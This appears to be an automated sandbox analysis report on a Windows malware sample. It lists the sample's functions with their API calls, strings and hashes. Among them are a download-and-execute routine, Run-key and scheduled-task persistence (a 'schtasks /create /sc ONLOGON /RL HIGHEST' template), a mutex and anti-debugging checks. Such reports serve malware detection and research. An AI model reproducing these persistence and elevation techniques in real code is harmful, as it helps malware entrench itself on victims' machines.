String ID: "$#$#$$$$$%$%s\schtasks.exe$/c "%s"$/create /sc ONLOGON /tn "%s" /tr "%s" /RL HIGHEST$;$>$?$?$C$I$L$L$L$L$L$L$N$N$b$b$cmd.exe$i$invalid distance code$invalid literal/length code$l$need dictionary$p$runas$y$z
API String ID: 2564131513-3794329617
Opcode ID: 5f5d072d470b6b1e8a6ade3a868bb12bbd3d70f05ae994f7e2b7439dbf0fd6e0
Instruction ID: 11b6d7aa5c15a73e0aa919fd347e31ebdf5fd90c57f6d033ef8515c442441843
Opcode Fuzzy Hash: 5f5d072d470b6b1e8a6ade3a868bb12bbd3d70f05ae994f7e2b7439dbf0fd6e0
Instruction Fuzzy Hash: 21421C68810369D9CB20AFA1E8047FA77F0FF2E705F415056E488EB960F3B849C5DB29

Function 00191420 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 294
memorysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,0000020A), ref: 00191460
HeapAlloc.KERNEL32(00000000), ref: 00191463
Sleep.KERNEL32(000003E8), ref: 001914AD
ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104), ref: 001914E3
SHCreateDirectoryExW.SHELL32(00000000,00000000,00000000), ref: 001914EE
SetFileAttributesW.KERNEL32(00000000,00000002), ref: 00191506
GetProcessHeap.KERNEL32(00000008,0000020A,00000000,00000000,000000FF,?), ref: 001915B9
HeapAlloc.KERNEL32(00000000), ref: 001915BC
PathCombineW.SHLWAPI(00000000,?,?), ref: 001915D6
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000), ref: 0019160E
HeapFree.KERNEL32(00000000), ref: 00191611
lstrcatW.KERNEL32(00000000,?), ref: 00191760
PathFileExistsW.SHLWAPI(00000000), ref: 00191767
GetCurrentProcess.KERNEL32(00000008,?), ref: 00191786
OpenProcessToken.ADVAPI32(00000000), ref: 0019178D
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 001917B0
CloseHandle.KERNEL32(?), ref: 001917C2

Part of subcall function 001925B0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 001925E1
Part of subcall function 001925B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 001925FB
Part of subcall function 001925B0: InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00192644
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0019265A
Part of subcall function 001925B0: HeapAlloc.KERNEL32(00000000), ref: 0019265D
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 001926AA
Part of subcall function 001925B0: RtlAllocateHeap.NTDLL(00000000), ref: 001926AD
Part of subcall function 001925B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 001926D7
Part of subcall function 001925B0: RtlFreeHeap.NTDLL(00000000), ref: 001926DA
Part of subcall function 001925B0: InternetCloseHandle.WININET(?), ref: 001926E6
Part of subcall function 001925B0: InternetCloseHandle.WININET(?), ref: 001926F3

CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?), ref: 0019181B
CloseHandle.KERNEL32(?), ref: 00191831
CloseHandle.KERNEL32(?), ref: 00191839
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0019183E
HeapFree.KERNEL32(00000000), ref: 00191841

Strings

K, xrefs: 001916B1
x, xrefs: 0019165D
D, xrefs: 001917EA
V, xrefs: 001916C6
05#v, xrefs: 00191506
.#v, xrefs: 001917C2, 0019182B
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0019164E

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$Process$CloseHandleInternet$AllocFileFreeOpen$CreatePathToken$AllocateAttributesCombineCurrentDirectoryEnvironmentExistsExpandInformationReadSleepStringslstrcat
String ID: 05#v$D$K$Software\Microsoft\Windows\CurrentVersion\Run$V$x$.#v
API String ID: 4228357295-1258431390
Opcode ID: 0e4351fc760eb2654e2bf63b4d44d913a322d1009cba7bb59688bfae4cc300a6
Instruction ID: 05c2deb9b1f0a560006dd59eb6696bf7d7f14f37ccbd59055920ff5ccff7bb3a
Opcode Fuzzy Hash: 0e4351fc760eb2654e2bf63b4d44d913a322d1009cba7bb59688bfae4cc300a6
Instruction Fuzzy Hash: D3C17E7490021AABDF20AFA0DC48BAEB7B8FF1A744F114059F549EB260EB7499C0CF55

Function 00191000 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 343
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpA.KERNEL32(00000000,?), ref: 001910A2
GetProcessHeap.KERNEL32(00000008,?), ref: 001910C7
HeapAlloc.KERNEL32(00000000), ref: 001910CE
lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 001910EC
GetProcessHeap.KERNEL32(00000008,?), ref: 0019123C
HeapAlloc.KERNEL32(00000000), ref: 00191243
GetProcessHeap.KERNEL32(00000008,00000002), ref: 00191285
HeapAlloc.KERNEL32(00000000), ref: 0019128C
GetProcessHeap.KERNEL32(00000008,00000047), ref: 001912E7
HeapAlloc.KERNEL32(00000000), ref: 001912EE
GetProcessHeap.KERNEL32(00000008,00000047), ref: 00191333
HeapAlloc.KERNEL32(00000000), ref: 0019133A
GetProcessHeap.KERNEL32(00000008,00000047), ref: 0019137F
HeapAlloc.KERNEL32(00000000), ref: 00191386
GetProcessHeap.KERNEL32(00000008,00000049), ref: 001913E5
HeapAlloc.KERNEL32(00000000), ref: 001913EC

Strings

M1Zw0w66GQYFi, xrefs: 001910E7, 0019110D

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$AllocProcess$lstrcmplstrlen
String ID: M1Zw0w66GQYFi
API String ID: 522894340-229323296
Opcode ID: 2fb17cb12d0505f03c9fc3b214930d8794561b1374838dee2745bc877bdfcaa3
Instruction ID: cb794c450b4ed6b89315c3ffb115c7046065b26f25def074163438ff13b4df0a
Opcode Fuzzy Hash: 2fb17cb12d0505f03c9fc3b214930d8794561b1374838dee2745bc877bdfcaa3
Instruction Fuzzy Hash: BCD11371C04165AFDB14CFA8C8946FBBBF4FF19310F1941AAE995D7342D6389981CBA0

Function 001925B0 Relevance: 19.6, APIs: 13, Instructions: 108
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 001925E1
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 001925FB
InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00192644
GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 0019265A
HeapAlloc.KERNEL32(00000000), ref: 0019265D
GetProcessHeap.KERNEL32(00000000,00000000,0000000100000000), ref: 00192668
RtlReAllocateHeap.NTDLL(00000000), ref: 0019266B
GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 001926AA
RtlAllocateHeap.NTDLL(00000000), ref: 001926AD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001926D7
RtlFreeHeap.NTDLL(00000000), ref: 001926DA
InternetCloseHandle.WININET(?), ref: 001926E6
InternetCloseHandle.WININET(?), ref: 001926F3

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Heap$Internet$Process$AllocateCloseHandleOpen$AllocFileFreeRead
String ID:
API String ID: 1681177425-0
Opcode ID: 7c6d18d34a40c0850fe454b9a8a57186b008ab41d5659ea530e645f99a96128f
Instruction ID: 3805ba46b9ad521b7bebe2beb1e6ad6ed502c3405e9e9fd49eaef5c0b299b9ae
Opcode Fuzzy Hash: 7c6d18d34a40c0850fe454b9a8a57186b008ab41d5659ea530e645f99a96128f
Instruction Fuzzy Hash: 6E314C71900229ABDB609B65DC48F9BBBBCFF86754F0081A5F54892250DE309D85CFA0

Function 001969E0 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 330
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00196C6A
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00196CFF
SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00196D8F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00196D96
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00196DA7

Strings

%s%s, xrefs: 00196C33
:, xrefs: 00196BF6
.#v, xrefs: 00196D96, 00196DA7
%s%s%s, xrefs: 00196C15

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: File$CloseHandle$CreateTimeWrite
String ID: %s%s$%s%s%s$:$.#v
API String ID: 3400595745-3451391609
Opcode ID: a983e1e076ae709c1ea8aab5fb389d77fedaa3d9564fd5bc8f7ee86545bc7166
Instruction ID: 3843f64816fd54bdaf0e891aa5d2d16ab2f4a27347cc838a10627454c6e670c2
Opcode Fuzzy Hash: a983e1e076ae709c1ea8aab5fb389d77fedaa3d9564fd5bc8f7ee86545bc7166
Instruction Fuzzy Hash: 5FB1C571B006189BDF34DF64DC85BAAB3B4FF14310F14066DE95AA7291E770AE94CBA0

Function 00196830 Relevance: 6.2, APIs: 4, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 001968B7
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 001968CB
GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 001969A7
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 001969BB

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 4e3db3e7a1ef084366429030797300a9b2bd9c4b8c3ee5550f802a679f165785
Instruction ID: 2ca25cfdc06d82a26649058fce09dd9fcd0dd5a66e21b08a37c67857faad60a3
Opcode Fuzzy Hash: 4e3db3e7a1ef084366429030797300a9b2bd9c4b8c3ee5550f802a679f165785
Instruction Fuzzy Hash: 65511A719003189BCF20DF78DC85BEAB3B8EF54310F144669E929D7191EB319D94CBA0

Function 00192710 Relevance: 4.6, APIs: 3, Instructions: 53
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00191000: lstrcmpA.KERNEL32(00000000,?), ref: 001910A2
Part of subcall function 00191000: GetProcessHeap.KERNEL32(00000008,?), ref: 001910C7
Part of subcall function 00191000: HeapAlloc.KERNEL32(00000000), ref: 001910CE
Part of subcall function 00191000: lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 001910EC

CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00192731
GetLastError.KERNEL32 ref: 00192737
ExitProcess.KERNEL32 ref: 0019277F

Part of subcall function 001924B0: GetCurrentProcess.KERNEL32(00000008,?), ref: 001924CC
Part of subcall function 001924B0: OpenProcessToken.ADVAPI32(00000000), ref: 001924D3
Part of subcall function 001924B0: GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 001924F3
Part of subcall function 001924B0: CloseHandle.KERNEL32(?), ref: 00192502

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: Process$HeapToken$AllocCloseCreateCurrentErrorExitHandleInformationLastMutexOpenlstrcmplstrlen
String ID:
API String ID: 2480484397-0
Opcode ID: 6c3a364f2f0100d73ef812ebbe907562d18673e2dfcfda7e5a478db27d9f106a
Instruction ID: 002c887b1d75c777d00acffeedfac9e841d44bb48b4bd6cd733f15641b431e40
Opcode Fuzzy Hash: 6c3a364f2f0100d73ef812ebbe907562d18673e2dfcfda7e5a478db27d9f106a
Instruction Fuzzy Hash: 3F01CD30108306FFDF18AF94DD49B6DB7A5AFA0341F148928F994511E1EB7098D4D7A3

Function 0019DC45 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,001A0BB6,?,00000000,?,?,001A0BDB,?,00000007,?,?,001A1029,?,?), ref: 0019DC5B
GetLastError.KERNEL32(?,?,001A0BB6,?,00000000,?,?,001A0BDB,?,00000007,?,?,001A1029,?,?), ref: 0019DC66

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 7a8eb6ad94b010b9080af9b994061390c3789bcf5939c14f5e6053001fb34579
Instruction ID: 34de6a4926fa98cb4c7fcfba89f9b9db573ca7389c147fd2ee8def0040d4ca31
Opcode Fuzzy Hash: 7a8eb6ad94b010b9080af9b994061390c3789bcf5939c14f5e6053001fb34579
Instruction Fuzzy Hash: 23E01272540218EBCF212FB4FE0DF9A7BACAB417D1F524064F6089A560DB7499D0CB94

Function 0019D8F2 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,7622F380,00000000,?,0019F219,00000001,00000364,00000000,00000006,000000FF,?,0019718C,00000000,?,00196E07,0000044C), ref: 0019D933

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2a022810efdd69cf29476d1da9107e034a50c32c8f0b6c1b4e7ea3cc6a6cc0cc
Instruction ID: 1ea0ac5bb484a96b53b776840b426d2601c9eea3f97787336bb2c4bc44c2402f
Opcode Fuzzy Hash: 2a022810efdd69cf29476d1da9107e034a50c32c8f0b6c1b4e7ea3cc6a6cc0cc
Instruction Fuzzy Hash: A5F08932A0112466DF227F62BC05B6B7758AF52BB4B154151FC14A7594DF30DD4186E0

Function 0019DC7F Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,0019718C,00000000,?,00196E07,0000044C,C6C014CA,7622F380,00000000,00000000,000000FF,?,001914D5), ref: 0019DCB1

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8a00e17463bef7ab738631f8bf28dc49bb5d1ebf1008f971434ef12bbc1d2fa8
Instruction ID: e0d3c9b3e655b02a442e96d489b1ca24213ec6465a72e373c1cdb0e63dae2308
Opcode Fuzzy Hash: 8a00e17463bef7ab738631f8bf28dc49bb5d1ebf1008f971434ef12bbc1d2fa8
Instruction Fuzzy Hash: A9E0923160022067EF213775BD04B5B7A5CAF427A0F560128FC56E65D0CBE4DC41D3E1

Non-executed Functions

Function 00196120 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 518COMMON

Download Yara Rule

Strings

\../, xrefs: 001963E7
/..\, xrefs: 00196415
/../, xrefs: 001963FE
\..\, xrefs: 001963D0

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID: /../$/..\$\../$\..\
API String ID: 0-3885502717
Opcode ID: 7aa31a0a9010e37ed2bc760fde00ad5097bf7221fac5537443b655fb00135099
Instruction ID: 9891efb45dcc75bcc9b36b0beb91a3249aec6bfe251664bd9d70c996d8f1797f
Opcode Fuzzy Hash: 7aa31a0a9010e37ed2bc760fde00ad5097bf7221fac5537443b655fb00135099
Instruction Fuzzy Hash: CE12C371A002148BDF29CF24C8917AABBF5EF55310F1846ADE84DDB286D735AB45CFA0

Function 001A27EB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 001A2A02

Strings

1#INF, xrefs: 001A2921
1#IND, xrefs: 001A28F0
1#SNAN, xrefs: 001A28F7
1#QNAN, xrefs: 001A28FE

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3dedd7ac5b8cfe806bca8ce2791fba1ca2e969d8e654da4627dad0da31c4c410
Instruction ID: a76f1fda52f60db896f6a5770fb4f6936114f824e3bbe8293fc9197928b13cfa
Opcode Fuzzy Hash: 3dedd7ac5b8cfe806bca8ce2791fba1ca2e969d8e654da4627dad0da31c4c410
Instruction Fuzzy Hash: B1D22875E082288FDB65CE28DC407EAB7B5EB4A315F1441EAE41DE7240E778AF858F41

Function 001A2340 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
Instruction ID: 315e3d86c96dd29605f5730e586e8ae7239916ea8e4eb2ac7564ab84dc900364
Opcode Fuzzy Hash: ee952e25a22fe5600719e129e6a69d76954a32707930552934fc297b8667f3ce
Instruction Fuzzy Hash: 47024A75E012199BDF14CFACC990AAEBBB1FF59314F248269E919E7340D731AE41CB90

Function 00197884 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00197890
IsDebuggerPresent.KERNEL32 ref: 0019795C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00197975
UnhandledExceptionFilter.KERNEL32(?), ref: 0019797F

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 5684954b27be23f22f75572ff02d1bdedc826d7afabddcbc24812d09ce3df1ac
Instruction ID: 2df5f2d56e6bb40a13fca168136b72f1db60578c8e0c1de746dd623fba152695
Opcode Fuzzy Hash: 5684954b27be23f22f75572ff02d1bdedc826d7afabddcbc24812d09ce3df1ac
Instruction Fuzzy Hash: F331F775D052189BDF20EFA4D949BCDBBB8AF08340F1041AAE40DAB290EB709BC5CF45

Function 0019D978 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0019DA70
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0019DA7A
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0019DA87

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 8846292d5f81ff8a38f7922d911179408fcaa228927ae7e236739f3192104018
Instruction ID: 1b3282fba9f5b32b852f237edb2981e794dc595c1674d09c4d55539697bd273f
Opcode Fuzzy Hash: 8846292d5f81ff8a38f7922d911179408fcaa228927ae7e236739f3192104018
Instruction Fuzzy Hash: 3731B3749112189BCF21DF28D9897DDBBB8AF18310F5041EAE41CA7261EB709F858F55

Function 00195D40 Relevance: 3.3, APIs: 2, Instructions: 326fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000,00000000), ref: 00195E1C
ReadFile.KERNEL32(FFFFFFFF,?,00004000,00004000,00000000,00000000), ref: 00195E40

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: File$PointerRead
String ID:
API String ID: 3154509469-0
Opcode ID: 047fcf00bef329a1de62ac190df44b88b2596abb763c389b2fdef54b6a609801
Instruction ID: eba40f0d5d8016f7d8dc21354b997d3e1defbc0b5fb66bc50c59713e0ec4ea09
Opcode Fuzzy Hash: 047fcf00bef329a1de62ac190df44b88b2596abb763c389b2fdef54b6a609801
Instruction Fuzzy Hash: 18C17C31A00B098FCB25CF69D49066AF7F2FF84314F14856EE496A7751D731AD45CB90

Function 001A7867 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001A7862,?,?,00000008,?,?,001A7465,00000000), ref: 001A7A94

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
